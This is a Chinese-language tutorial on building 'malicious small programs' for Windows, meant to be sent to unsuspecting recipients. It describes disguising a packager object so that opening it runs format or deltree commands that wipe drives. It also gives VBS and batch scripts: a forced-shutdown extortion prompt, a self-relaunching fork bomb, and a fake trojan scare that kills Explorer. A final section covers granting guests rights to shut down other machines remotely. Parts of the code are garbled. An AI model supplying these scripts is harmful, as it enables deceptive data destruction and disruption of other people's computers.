2024年1月6日发(作者:)

恶意小程序1:

下面我就将恶意程序的制作方法教给大家:

1.创建一个只包含一个空格(为了减小文件体积)的文本文件,任意取名。

2.打开{写字板文档},将此文件拖放入{写字板文档}。也可以点击记{写字板文档}单栏中的“插入对象”,弹出“插入对象”对话框,选中“从文件创建”,然后点击“浏览”按钮选择要插入的文件。

3.选中该插入对象的图标,选择菜单栏中的“编辑包对象编辑包”(如图1)。在弹出的“对象包装程序”对话框中,选择菜单栏中的“编辑命令行”,然后输入如下命令: /m format c:/q /autotest /u ,点击“确定”,此时,容栏中会显示出命令容。

4.点击外观栏中的“插入图标”按钮,会弹出一个警告对话框,确认,然后任选一个图标。

5.选择菜单栏中的“编辑卷标”,为此嵌入对象取一个名称(会替换原来的文件名称)。点击“文件”菜单中的“更新”,然后关闭此对话框。

6.将刚刚建立的嵌入对象拖放到桌面上。文件的默认名是“碎片”(在2000下的默认名为”片段”),现在我们把它改成“”。打开电子程序将桌面上的“”作为附件发出,或者将含有嵌入对象(带有恶意命令)的文档作为附件发出。

7.当接收者误将“”文件作为“”(如前文所述,“.SHS”扩展名永远是隐藏的)放心地打开时,或打开文件,点击文件中的嵌入对象时触发恶意命令(弹出DOS运行窗口,执行格式化命令).如果将上面的命令替换为: /m deltree /y a:*.* c:*.* d:*.* 则是将删除对方硬盘下所有文件(盘符根据实际情况自定义);如果替换为: /m deltree /y

c:windowssystem*.* 则是删除对方c:windowssystem目录底下的所有文件.(当然大家可以改成其它的命令)

真的很简单,就这样一个恶意的攻击程序被弄出来了,太可怕了!

恶意小程序2:

我们开始制作.在桌面建立个记事本,然后把下面代码复制进去

on error resume next

dim WSHshellA

set WSHshellA = object("")

"cmd.EⅩE /c shutdown -r -t 60 -c ""说我是猪,不说我是猪就一分钟关你机,不信,试试···"" ",0 ,true

dim a

do while(a <> "我是猪")

a = inputbox ("说我是猪,就不关机,快撒,说 ""我是猪"" ","说不说","不说",8000,7000)

msgbox chr(13) + chr(13) + chr(13) + a,0,"MsgBox"

loop

msgbox chr(13) + chr(13) + chr(13) + "早说就行了嘛"

dim WSHshell

set WSHshell = object("")

"cmd.EⅩE /c shutdown -a",0 ,true

msgbox chr(13) + chr(13) + chr(13) + "哈哈哈哈,一切皆有可能~"

复制之后呢,把后缀修改为.vbs或者改变打开方式为应用程序,这样你再压缩下用QQ发给你朋友,对方打开了就在60秒要关闭计算机,

结素任务都不行,他只能说他是猪才能解决问题。够坏吧? 注意哦,你可以把我是猪那个修改成任意想说的话,要是对付你喜欢的人,

就修改成 我爱你 这样他只有说我爱你之后才不关闭计算机哦 也可以把时间修改为20 就是说打开了20秒就关了,还没等对方打完就关机了 是不是叫对方很郁闷呢?

第2招编写VBS脚本

首先你可以看下面的

("嘿,你打开我哦,我等你很久拉!"&TSName)

("你是可爱的小朋吗?")

("哈,我想你拉,这你都不知道吗?")

("怎么才来,说~是不是不关心我")

("哼,我生气拉,等你这么久,心都凉啦。")

("小强很生气,后果很严重哦。")

("嘿嘿!你也会很惨滴哦")

("是不是想清除我?")

("那你要点上50下哦,不过会给你惊喜滴")

("还剩49下,快点点哦")

("还剩48下,快点,小笨蛋!")

("还剩47下对,就这样快点点!")

("还剩46下。你啊就是笨,要快哦,我先不打扰你工作。")

("还剩45下,记得要快哦!")

("还剩43下")

("还剩42下")

("还剩41下")

("还剩40下")

("还剩39下")

("还剩38下")

("还剩37下")

("还剩36下")

("还剩35下")

("还剩34下")

("还剩33下")

("还剩32下")

("还剩30下")

("还剩29下")

("还剩28下")

("还剩27下")

("还剩26下")

("还剩25下")

("还剩24下")

("还剩23下")

("还剩22下")

("还剩21下")

("还剩20下")

("还剩19下")

("还剩18下")

("还剩17下")

("还剩16下")

("还剩15下")

("还剩14下")

("还剩13下停停!!!慢点,我有话要说")

("还剩12下,你继续点我就会消失滴")

("还剩11下,以后就看不到我拉。555555")

("还剩10下,你现在可以选择停止!")

("还剩9下。你还点啊,不要我拉?")

("还剩8下,有点伤心拉,干嘛丢弃人家")

("还剩7下。疯了,你有点负意!")

("还剩6下。对。你就点吧,我恨你!")

("还剩5下,不明白,删除我你就好吗?")

("还剩4下!真要删除我?")

("还剩3下。可是我真的很眷恋你。。。")

("还剩2下。不要这么绝情嘛,人家是爱你的!")

("还剩1下。哼,既然你这么绝情。也别怪我无义!!!")

("我本因该消失的,不过我留恋你滴芳容,上帝又给了一次机会。")

("想结素我么?那你就再多点一次")

("想结素我么?那你就再多点一次")

("想结素我么?那你就再多点一次")

("想结素我么?那你就再多点一次")

("想结素我么?那你就再多点一次")

("想结素我么?那你就再多点一次")

("想结素我么?那你就再多点一次")

("想结素我么?那你就再多点一次")

("想结素我么?那你就再多点一次")

("想结素我么?那你就再多点一次")

把这个复制在记事本,把后缀修改成.vbs

用记事本方式保存下列代码,把后缀改成.bat

echo off

echo 你中招了

:a

start cmd.EⅩE

start %0

goto a

用记事本方式保存下列代码,把后缀改成.bat

echo off

echo 你中招了

:a

start cmd.EⅩE

start %0

goto a

color 4f

echo off

echo 删除计算机的C盘的所有文件......

ping 127.0.0.1 /n 2 >nul

echo 已删除完毕

echo.

echo 删除计算机的D盘的所有文件......

ping 127.0.0.1 /n 2 >nul

echo 已删除完毕

echo.

echo 删除计算机的E盘的所有文件......

ping 127.0.0.1 /n 2 >nul

echo 已删除完毕

color

echo.

echo. =========================================

echo. 啊哈哈,都删关,都杀关,哈哈 ……

echo. =========================================

echo. 系统将马上崩溃......

echo. 这是一个木马程序......所有资料已经传到 [url=mailto:X163.]X163.[/url]

shutdown /r /t 30 /c "电脑在30s即将崩溃或爆炸,请拨打1589737****求助或直接爬下……"

ntsd -c q -pn explorer.EⅩE

ping 127.0.0.1 /n 20 >nul

start explorer.EⅩE

shutdown -a

复制以上代码保存为bat文件。。。

这个利用调用自身的BAT 不会对电脑有什么伤害 用来吓人还不错。。。

echo off

echo start c:>>c:

start c:

保存为BAT文件运行 就ok了

大家可以进行改进,把它改的更完美。。。

其实玩下很爽 哈哈

恶意小程序3:

"开始“-->”运行“-->cmd

然后在此输入: shutdown 这样的命令则是查看所有命令在这里你可以

看到的就是这里面包含的所有命令参数.

-i 显示 GUI 界面,必须是第一个选项

-l 注销(不能与选项 -m 一起使用)

-s 关闭此计算机

-r 关闭并重启动此计算机

-a 放弃系统关机

-m computername 远程计算机关机/重启动/放弃

-t xx 设置关闭的超时为 xx 秒

-c "comment" 关闭注释(最大 127 个字符)

-f 强制运行的应用程序关闭而没有警告

-d [u][p]:xx:yy 关闭原因代码

u 是用户代码

p 是一个计划的关闭代码

xx 是一个主要原因代码(小于 256 的正整数)

yy 是一个次要原因代码(小于 65536 的正整数)

在这里你也可以做到给自己关机也可以给其他用户关机,在这里面有

一个界面模式的方法也是输入: shutdown -i 这个命令将会出现界面

模式方便与操作了!

在这里你可以输入对方的IP地址与关机原因和时间,然后确认,这时

对方的计算机将会执行你所发送的命令 是关机 是注销 还是重新启动

都可以操作的.

这个命令一般都是为管理员方便管理所应用程序,在LAN中是可以使用的.

这个关机的模式和冲击波病毒有点类似,所以假如在遇到一切强制关机的话,

你可以是使用这个命令试验一下可以解决吗?

命令是: shutdown -a 这个是取消命令!

例如,shutdown -s -t 60 -m 192.168.2.1 是一分钟后关闭2.1这台机器

1、注销当前用户

shutdown - l

该命令只能注销本机用户,对远程计算机不适用。

2、关闭本地计算机 shutdown - s

3、重启本地计算机

shutdown - r

4、定时关机

shutdown - s -t 30

指定在30秒之后自动关闭计算机。

5、中止计算机的关闭

有时我们设定了计算机定时关机后,如果出于某种原因又想取消这次关机操作,就可以用 shutdown - a 来中止。如:

shutdown -s C t 300 设定计算机在5分钟后关闭。

Shutdown C a 取消上述关机操作。

以上是shutdown命令在本机中的一些基本应用。前面我们已经介绍过,该命令除了关闭、重启本地计算机外,更重要的是它还能对远程计算机进行操作,但是如何才能实现呢?

在该命令的格式中,有一个参数

于是,我用以下命令试了一下:&NBSP;

shutdown Cs Cm netproxy -t 30

(在30秒关闭计算机名为netproxy的机器;注:netproxy为局域网一台同样装有Windows XP的电脑)

但该命令执行后,计算机netproxy一点反应都没有,我的屏幕上却返回这样一句话:Access is denied (拒绝访问)。

为什么会出现这种情况呢?我想了半天,四处查找有关的资料,终于发现,在Windows XP默认的安全策略中,只有管理员组的用户才有权从远端关闭计算机,而一般情况下我们从局域网的其他电脑来访问该计算机时,则只有guest用户权限,所以当我们执行上述命令时,便会出现“拒绝访问”的情况。

找到问题的根源之后,解决的办法也很简单,只要在客户计算机(能够被远程关闭的计算机,如上述的netproxy)中赋予guest用户远程关机的权限即可。这可利用Windows XP的“组策略”或“管理工具”中的“本地安全策略”来实现。下面以“组策略”为例进行介绍:

1、单击“开始”按钮,选择“运行”,在对话框中输入“”,然后单击“确定”,打开“组策略编辑器”。

2、在“组策略”窗口的左窗格中打开“计算机配置”—“Windows 设置”—“安全设置”—“本地策略”—“用户权利指派”。 3、在“组策略”窗口的右窗格中选择“Force

shutdown from a remote system (从远端系统强制关机)”,双击。

4、在弹出的对话框中显示目前只有“Administrators”组的成员才有权从远程关机;单击对话框下方的“添加用户或组”按钮,然后在新弹出的对话框中输入“guest”,再单击“确定”。

5、这时在“从远端系统强制关机”的属性中便添加了一个“guest”用户,单击“确定”即可。

6、关闭“组策略”窗中。

通过上述操作后,我们便给计算机netproxy的guest用户授予了远程关机的权限。以后,我们要远程关闭计算机netproxy,只要在网络中其他装有Windows XP

的电脑中输入以下命令即可:

shutdown -s Cm netproxy -t 30 (其他参数用法同上)

这时,在netproxy计算机的屏幕上将显示一个“系统关机”的对话框,提示“系统即将关机。请保存所有正在运行的工作,然后注销。未保存的改动将会丢失。关机是由netproxyguest初始的。”在对话框下方还有一个计时器,显示离关机还有多少时间。在等待关机的时间里,用户还可以执行其他的任务,如关闭程序、打开文件等,但无法关闭该对话框,除非你用shutdown Ca命令来中止关机任务。

最后,有一点要说明的是,shutdown命令不但可以远程关闭装有Windows XP系统的计算机,它还可以远程关闭装有Windows 2000系统的计算机(对于Win9X嘛,好像不适用)。有关Windows 2000客户计算机上的一些设置,操作方法同上,这里就不再多说了。 另外shutdown作为一个外部命令(其对应文件为Windowssystem32文件夹下的),我们还可将它复制到Windows 2000的机器上,这样,在装有Windows 2000系统的机器之间便也能相互实现远程关机

XP中的一个远程关机命令

在我们最长用的系统中,存在这很多的命令在这这命令中是分为两部分的.

一部分是外部命令,另一部分则是部命令

在系统下我们可以在运行输入 cmd 可以调出带命令提示符窗口在这里我们就可以输入命令了.首先先给大家介绍一个外部命令远程关机的命令.

首先为了让大家有一个明确的概念先说一下什么是外部命令与部命令,外部命令则是系统继承并非DOS下命令.而部命令则是DOS程序自身的命令了.

是如开启远程关机呢?操作方法:

开始菜单->运行->输入 cmd 这个命令则回出现带命令提示符窗口

然后在此输入: shutdown ? 这样的命令则是查看所有命令在这里你可以看到的就是这里面包含的所有命令参数.

-i 显示 GUI 界面,必须是第一个选项

-l 注销(不能与选项 -m 一起使用)

-s 关闭此计算机

-r 关闭并重启动此计算机

-a 放弃系统关机

-m computername 远程计算机关机/重启动/放弃

-t xx 设置关闭的超时为 xx 秒

-c "comment" 关闭注释(最大 127 个字符)

-f 强制运行的应用程序关闭而没有警告

-d [u][p]:xx:yy 关闭原因代码

u 是用户代码

p 是一个计划的关闭代码

xx 是一个主要原因代码(小于 256 的正整数)

yy 是一个次要原因代码(小于 65536 的正整数)

在这里你也可以做到给自己关机也可以给其他用户关机,在这里面有一个界面模式的方法也是输入: shutdown -i 这个命令将会出现界面模式方便与操作了!

在这里你可以输入对方的IP地址与关机原因和时间,然后确认,这时对方的计算机将会执行你所发送的命令 是关机 是注销 还是重新启动都可以操作的.

这个命令一般都是为管理员方便管理所应用程序,在LAN中是可以使用的.这个关机的模式和冲击波病毒有点类似,所以假如在遇到一切强制关机的话,你可以是使用这个命令试验一下可以解决吗?

命令是: shutdown -a 这个是取消命令!

要想关别人机子,你要先在别人的电脑上做点手脚.因为你登陆被控制的机器是以guest的身份登陆的,当然没权限去关机了。解决的办法也很简单,只要在别人计算机中赋予guest用户远程关机的权限即可.

1、在命令行中输入命令:,这时便会打开组策略编辑器;

2、在“组策略”窗口的左窗格中打开“计算机配置”—“windows 设置”—“安全设置”—“本地策略”—“用户权利指派”。

3、在“组策略”窗口的右窗格中选择“force shutdown from a remote system (从远端系统强制关机)”,双击。

4、在弹出的对话框中显示目前只有“administrators”组的成员才有权从远程关机;单击对话框下方的“添加用户或组”按钮,然后在新弹出的对话框中输入“guest”,再单击“确定”。

5、这时在“从远端系统强制关机”的属性中便添加了一个“guest”用户,单击“确定”即可

嘿嘿,再去试试.当然只是局域网使用windows xp的电脑